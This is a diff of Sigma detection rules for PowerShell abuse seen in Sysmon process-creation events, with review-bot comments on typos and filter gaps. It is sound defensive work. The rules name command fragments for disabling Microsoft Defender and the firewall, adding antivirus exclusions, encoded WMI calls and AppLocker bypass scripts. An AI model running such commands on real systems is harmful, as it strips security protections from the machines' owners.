@@ -27,22 +26,28 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: + # ::("L"+"oad") - OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ - oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA - 6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA + # ::("Lo"+"ad") - OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ - oAOgAoACIATABvACIAKwAiAGEAZAAiACkA - 6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA + # ::("Loa"+"d") - OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ - oAOgAoACIATABvAGEAIgArACIAZAAiACkA - 6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA + # ::('L'+'oad') - OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ - oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA - 6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA + # ::('Lo'+'ad') - OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ - oAOgAoACcATABvACcAKwAnAGEAZAAnACkA - 6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA + # ::('Loa'+'d') - OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ - oAOgAoACcATABvAGEAJwArACcAZAAnACkA - 6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml index 6b33db304..ff5c5fc6b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml @@ -1,11 +1,10 @@ title: PowerShell Base64 Encoded WMI Classes id: 1816994b-42e1-4fb1-afd2-134d88184f71 related: - - id: 47688f1b-9f51-4656-b013-3cc49a166a36 - type: obsoletes + - id: 47688f1b-9f51-4656-b013-3cc49a166a36 + type: obsoletes status: test -description: Detects calls to base64 encoded WMI class such as "Win32_Shadowcopy", - "Win32_ScheduledJob", etc. +description: Detects calls to base64 encoded WMI class such as "Win32_Shadowcopy", "Win32_ScheduledJob", etc. references: - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) 
@@ -24,14 +23,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli_shadowcopy: - CommandLine|contains: + # Win32_Shadowcopy + CommandLine|contains: - VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ - cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA - XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A @@ -39,7 +39,8 @@ detection: - dpbjMyX1NoYWRvd2NvcH - XaW4zMl9TaGFkb3djb3B5 selection_cli_scheduledJob: - CommandLine|contains: + # Win32_ScheduledJob + CommandLine|contains: - VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA - cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA - XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg @@ -47,7 +48,8 @@ detection: - dpbjMyX1NjaGVkdWxlZEpvY - XaW4zMl9TY2hlZHVsZWRKb2 selection_cli_process: - CommandLine|contains: + # Win32_Process + CommandLine|contains: - VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw - cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA - XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA @@ -55,7 +57,8 @@ detection: - dpbjMyX1Byb2Nlc3 - XaW4zMl9Qcm9jZXNz selection_cli_useraccount: - CommandLine|contains: + # Win32_UserAccount + CommandLine|contains: - VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A - cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA - XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA @@ -63,7 +66,8 @@ detection: - dpbjMyX1VzZXJBY2NvdW50 - XaW4zMl9Vc2VyQWNjb3Vud selection_cli_loggedonuser: - CommandLine|contains: + # Win32_LoggedOnUser + CommandLine|contains: - VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA - cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA - XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_cl_invocation.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_cl_invocation.yml index 0f2f586d3..8c4413ce4 100644 
--- a/sigma/sysmon/process_creation/proc_creation_win_powershell_cl_invocation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_cl_invocation.yml @@ -1,8 +1,7 @@ title: Potential Process Execution Proxy Via CL_Invocation.ps1 id: a0459f02-ac51-4c09-b511-b8c9203fc429 status: test -description: Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" - script to proxy execution using "System.Diagnostics.Process" +description: Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process" references: - https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/ - https://twitter.com/bohops/status/948061991012327424 @@ -21,7 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: 'SyncInvoke ' + # Note: As this function is usually called from within powershell, classical process creation even would not catch it. This will only catch inline calls via "-Command" or "-ScriptBlock" flags for example. + CommandLine|contains: 'SyncInvoke ' condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_cl_loadassembly.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_cl_loadassembly.yml index 99a8ebf3a..01ba04526 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_cl_loadassembly.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_cl_loadassembly.yml 
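Review bot: The comment added in the `@@ -21,7 +20,8 @@` hunk reads "classical process creation even would not catch it", where "even" should be "event"; the identical comment is added to proc_creation_win_powershell_cl_loadassembly.yml in its `@@ -22,7 +20,8 @@` hunk. Suggested wording for both: `# Note: As this function is usually called from within powershell, a classical process creation event would not catch it. This will only catch inline calls via "-Command" or "-ScriptBlock" flags for example.`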
@@ -1,9 +1,7 @@ title: Assembly Loading Via CL_LoadAssembly.ps1 id: c57872c7-614f-4d7f-a40d-b78c8df2d30d status: experimental -description: Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that - are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different - assemblies and bypass App locker controls. +description: Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls. references: - https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ - https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/ @@ -22,7 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + # Note: As this function is usually called from within powershell, classical process creation even would not catch it. This will only catch inline calls via "-Command" or "-ScriptBlock" flags for example. + CommandLine|contains: - 'LoadAssemblyFromPath ' - 'LoadAssemblyFromNS ' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml index d0f115e24..eda486dcd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml 
@@ -1,12 +1,10 @@ title: Potential Script Proxy Execution Via CL_Mutexverifiers.ps1 id: 1e0e1a81-e79b-44bc-935b-ddb9c8006b3d status: experimental -description: Detects the use of the Microsoft signed script "CL_mutexverifiers" to - proxy the execution of additional PowerShell script commands +description: Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands references: - https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/ -author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, - frack113 +author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113 date: 2022/05/21 modified: 2023/08/17 tags: @@ -22,12 +20,14 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_pwsh: ParentImage|endswith: + # Note: to avoid potential FPs we assume the script was launched from powershell. But in theory it can be launched by any Powershell like process - \powershell.exe - \pwsh.exe Image|endswith: \powershell.exe - CommandLine|contains: ' -nologo -windowstyle minimized -file ' + CommandLine|contains: ' -nologo -windowstyle minimized -file ' selection_temp: - CommandLine|contains: + # Note: Since the function uses "env:temp" the value will change depending on the context of exec + CommandLine|contains: - \AppData\Local\Temp\ - \Windows\Temp\ condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml index fb4e0f0f0..67e784b01 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml 
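Review bot: In the `@@ -22,12 +20,14 @@` hunk the new note says the script "can be launched by any Powershell like process", yet the child `Image|endswith: \powershell.exe` only matches the Windows PowerShell binary while `ParentImage|endswith` accepts both `\powershell.exe` and `\pwsh.exe`; if this is intentional (the script's own launch line resolving to `powershell`), a one-line comment on `Image|endswith` saying so would spare the next reader the question, otherwise `\pwsh.exe` should be considered there too. As a point of style, the note is inserted between `ParentImage|endswith:` and its first list item, which splits the list; placing it above the `ParentImage|endswith:` key keeps the YAML list contiguous, consistent with how the `selection_temp` note in the same hunk is placed above its key.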
@@ -1,8 +1,7 @@ title: ConvertTo-SecureString Cmdlet Usage Via CommandLine id: 74403157-20f5-415d-89a7-c505779585cf status: test -description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. - Which is fairly uncommon and could indicate potential suspicious activity +description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/convertto-securestring?view=powershell-7.3#examples @@ -23,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains: ConvertTo-SecureString + CommandLine|contains: ConvertTo-SecureString condition: process_creation and (all of selection_*) falsepositives: - Legitimate use to pass password to different powershell commands diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml index ca68aabe0..5c5eae4c2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml 
@@ -1,8 +1,7 @@ title: Potential PowerShell Obfuscation Via Reversed Commands id: b6b49cd1-34d6-4ead-b1bf-176e9edba9a4 status: test -description: Detects the presence of reversed PowerShell commands in the CommandLine. - This is often used as a method of obfuscation by attackers +description: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers references: - https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/ - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66 @@ -23,18 +22,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains: + CommandLine|contains: - hctac - kaerb - dnammoc - - ekovn + - ekovn # Also covers 'ekovni' - eliFd - rahc - etirw @@ -57,7 +56,10 @@ detection: - hcaerof - retupmoc filter_main_encoded_keyword: - CommandLine|contains: + # We exclude usage of encoded commands as they might generate FPs as shown here: + # https://github.com/SigmaHQ/sigma/pull/2720 + # https://github.com/SigmaHQ/sigma/issues/4270 + CommandLine|contains: - ' -EncodedCommand ' - ' -enc ' condition: process_creation and (all of selection_* and not 1 of filter_main_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml index f96939a3f..af1194f19 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml 
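Review bot: In the `@@ -57,7 +56,10 @@` hunk, `filter_main_encoded_keyword` excludes only the spellings `' -EncodedCommand '` and `' -enc '`, while powershell.exe also accepts shorter unambiguous prefixes of the switch (` -e `, ` -ec `, ` -en `), so encoded command lines written that way still reach the reversed-string matching and can reproduce the false positives the two linked issues describe. Either list those variants in the filter as well, or extend the new comment to state why only these two spellings are excluded, e.g. `# Only the long form and "-enc" are excluded; shorter prefixes are left in deliberately to keep the filter narrow`. The rule's `selection_cli` list continues outside this hunk.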
@@ -4,8 +4,7 @@ status: test description: Detects the PowerShell command lines with special characters references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64 -author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton - (fp) +author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp) date: 2020/10/15 modified: 2023/04/06 tags: @@ -22,24 +21,24 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_re: - - CommandLine|re: .*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.* - - CommandLine|re: .*\{.*\{.*\{.*\{.*\{.*\{.*\{.*\{.*\{.*\{.* - - CommandLine|re: .*\^.*\^.*\^.*\^.*\^.* - - CommandLine|re: .*`.*`.*`.*`.*`.* + # TODO: Optimize for PySIGMA + - CommandLine|re: .*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.* + - CommandLine|re: .*\{.*\{.*\{.*\{.*\{.*\{.*\{.*\{.*\{.*\{.* + - CommandLine|re: .*\^.*\^.*\^.*\^.*\^.* + - CommandLine|re: .*`.*`.*`.*`.*`.* filter_optional_amazonSSM: ParentImage: C:\Program Files\Amazon\SSM\ssm-document-worker.exe filter_optional_defender_atp: - CommandLine|contains: + CommandLine|contains: - new EventSource("Microsoft.Windows.Sense.Client.Management" - - public static extern bool InstallELAMCertificateInfo(SafeFileHandle - handle); + - public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle); condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: - Amazon SSM Document Worker 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml index fdae3eaaf..18cc01d8a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml @@ -1,11 +1,10 @@ title: Computer Discovery And Export Via Get-ADComputer Cmdlet id: 435e10e4-992a-4281-96f3-38b11106adde related: - - id: db885529-903f-4c5d-9864-28fe199e6370 - type: similar + - id: db885529-903f-4c5d-9864-28fe199e6370 + type: similar status: test -description: Detects usage of the Get-ADComputer cmdlet to collect computer information - and output it to a file +description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ @@ -25,17 +24,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'Get-ADComputer ' - ' -Filter \*' - CommandLine|contains: + CommandLine|contains: - ' > ' - ' | Select ' - Out-File 
@@ -43,7 +42,6 @@ detection: - Add-Content condition: process_creation and (all of selection_*) falsepositives: - - Legitimate admin scripts may use the same technique, it's better to exclude - specific computers or users who execute these commands or scripts often + - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_create_service.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_create_service.yml index 4b13fe1d9..638d50895 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_create_service.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_create_service.yml @@ -1,8 +1,8 @@ title: New Service Creation Using PowerShell id: c02e96b7-c63a-4c47-bd83-4a9f74afcfb2 related: - - id: 85ff530b-261d-48c6-a441-facaa2e81e48 - type: similar + - id: 85ff530b-261d-48c6-a441-facaa2e81e48 # Using Sc.EXE + type: similar status: test description: Detects the creation of a new service using powershell. references: @@ -22,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - New-Service - -BinaryPathName condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_decode_gzip.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_decode_gzip.yml index 553df5e59..f87688140 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_decode_gzip.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_decode_gzip.yml 
@@ -18,13 +18,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - GZipStream - ::Decompress condition: process_creation and selection falsepositives: - - Legitimate administrative scripts may use this functionality. Use "ParentImage" - in combination with the script names and allowed users and applications to - filter legitimate executions + - Legitimate administrative scripts may use this functionality. Use "ParentImage" in combination with the script names and allowed users and applications to filter legitimate executions level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_decrypt_pattern.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_decrypt_pattern.yml index e31a53d4d..3c38dc523 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_decrypt_pattern.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_decrypt_pattern.yml @@ -1,8 +1,7 @@ title: PowerShell Execution With Potential Decryption Capabilities id: 434c08ba-8406-4d15-8b24-782cb071a691 status: experimental -description: Detects PowerShell commands that decrypt an ".LNK" "file to drop the - next stage of the malware. +description: Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware. references: - https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/ author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) 
@@ -26,29 +25,29 @@ detection: - PowerShell.EXE - pwsh.dll selection_cli_dir: - CommandLine|contains: + CommandLine|contains: - 'Get-ChildItem ' - 'dir ' - 'gci ' - 'ls ' selection_cli_gc: - CommandLine|contains: + CommandLine|contains: - 'Get-Content ' - 'gc ' - 'cat ' - 'type ' - ReadAllBytes selection_cli_specific: - - CommandLine|contains|all: - - ' ^| ' - - \*.lnk - - -Recurse - - '-Skip ' - - CommandLine|contains|all: - - ' -ExpandProperty ' - - \*.lnk - - WriteAllBytes - - ' .length ' + - CommandLine|contains|all: + - ' ^| ' + - \*.lnk + - -Recurse + - '-Skip ' + - CommandLine|contains|all: + - ' -ExpandProperty ' + - \*.lnk + - WriteAllBytes + - ' .length ' condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_defender_disable_feature.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_defender_disable_feature.yml index 8feb6ddf2..89289fc57 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_defender_disable_feature.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_defender_disable_feature.yml @@ -1,8 +1,7 @@ title: Powershell Defender Disable Scan Feature id: 1ec65a5f-9473-4f12-97da-622044d6df21 status: test -description: Detects requests to disable Microsoft Defender features using PowerShell - commands +description: Detects requests to disable Microsoft Defender features using PowerShell commands references: - https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps - https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE 
@@ -22,11 +21,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cli_cmdlet: - CommandLine|contains: + CommandLine|contains: - 'Add-MpPreference ' - 'Set-MpPreference ' selection_cli_option: - CommandLine|contains: + CommandLine|contains: - 'DisableArchiveScanning ' - 'DisableRealtimeMonitoring ' - 'DisableIOAVProtection ' @@ -35,11 +34,12 @@ detection: - 'DisableCatchupFullScan ' - 'DisableCatchupQuickScan ' selection_cli_value: - CommandLine|contains: + CommandLine|contains: - $true - ' 1 ' selection_encoded_modifier: - CommandLine|base64offset|contains: + CommandLine|base64offset|contains: + # Note: Since this is calculating offsets casing is important - 'disablearchivescanning ' - 'DisableArchiveScanning ' - 'disablebehaviormonitoring ' @@ -55,7 +55,7 @@ detection: - 'disablerealtimemonitoring ' - 'DisableRealtimeMonitoring ' selection_encoded_direct: - CommandLine|contains: + CommandLine|contains: - RABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgA - QAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIA - EAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAA diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_defender_exclusion.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_defender_exclusion.yml index ddd9631eb..1a2137613 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_defender_exclusion.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_defender_exclusion.yml 
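Review bot: The comment `# Note: Since this is calculating offsets casing is important` added under `selection_encoded_modifier` (second hunk on this line) states that casing matters but not why a reader should care when editing the list. `base64offset` matches the base64 encoding of the literal value bytes at each of the three alignments, and base64 output is case-sensitive, so unlike the `|contains` selections above it this selection will not match a differently cased cmdlet argument unless that casing is listed. Suggest `# Note: base64offset matches the encoded bytes, so this selection is case-sensitive (unlike |contains); list every casing variant explicitly`. The rest of the value list continues outside the hunk.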
@@ -1,11 +1,10 @@ title: Powershell Defender Exclusion id: 17769c90-230e-488b-a463-e05c08e9d48f related: - - id: c1344fa2-323b-4d2e-9176-84b4d4821c88 - type: similar + - id: c1344fa2-323b-4d2e-9176-84b4d4821c88 + type: similar status: test -description: Detects requests to exclude files, folders or processes from Antivirus - scanning using PowerShell cmdlets +description: Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets references: - https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md @@ -25,11 +24,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: + CommandLine|contains: - 'Add-MpPreference ' - 'Set-MpPreference ' selection2: - CommandLine|contains: + CommandLine|contains: - ' -ExclusionPath ' - ' -ExclusionExtension ' - ' -ExclusionProcess ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml index 7ed0bcd55..a87f60f17 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml 
@@ -21,37 +21,34 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_pwsh_binary: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_pwsh_cli: - CommandLine|contains: + CommandLine|contains: - -DisableBehaviorMonitoring $true - -DisableRuntimeMonitoring $true selection_sc_binary: - - Image|endswith: \sc.exe - - OriginalFileName: sc.exe + - Image|endswith: \sc.exe + - OriginalFileName: sc.exe selection_sc_tamper_cmd_stop: - CommandLine|contains|all: + CommandLine|contains|all: - stop - WinDefend selection_sc_tamper_cmd_delete: - CommandLine|contains|all: + CommandLine|contains|all: - delete - WinDefend selection_sc_tamper_cmd_disabled: - CommandLine|contains|all: + CommandLine|contains|all: - config - WinDefend - start=disabled - condition: process_creation and (all of selection_pwsh_* or (selection_sc_binary - and 1 of selection_sc_tamper_*)) + condition: process_creation and (all of selection_pwsh_* or (selection_sc_binary and 1 of selection_sc_tamper_*)) falsepositives: - - Minimal, for some older versions of dev tools, such as pycharm, developers were - known to sometimes disable Windows Defender to improve performance, but this - generally is not considered a good security practice. + - Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice. level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_disable_firewall.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_disable_firewall.yml index 2c56c2fcc..2f5bba507 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_disable_firewall.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_disable_firewall.yml @@ -1,8 +1,8 @@ title: Windows Firewall Disabled via PowerShell id: 12f6b752-042d-483e-bf9c-915a6d06ad75 related: - - id: 488b44e7-3781-4a71-888d-c95abfacf44d - type: similar + - id: 488b44e7-3781-4a71-888d-c95abfacf44d + type: similar status: test description: Detects attempts to disable the Windows Firewall using PowerShell references: @@ -22,20 +22,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_name: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - \powershell_ise.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - \powershell_ise.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_args: - CommandLine|contains|all: + CommandLine|contains|all: - 'Set-NetFirewallProfile ' - ' -Enabled ' - ' False' selection_opt: - CommandLine|contains: + CommandLine|contains: - ' -All ' - Public - Domain diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_disable_ie_features.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_disable_ie_features.yml index 09fcad18f..b6f03b3f1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_disable_ie_features.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_disable_ie_features.yml @@ -1,8 +1,7 @@ title: Disabled IE Security Features id: fb50eb7a-5ab1-43ae-bcc9-091818cb8424 status: test -description: Detects command lines that indicate unwanted modifications to registry - keys that disable important Internet Explorer security features +description: Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features references: - https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/ author: Florian Roth (Nextron Systems) 
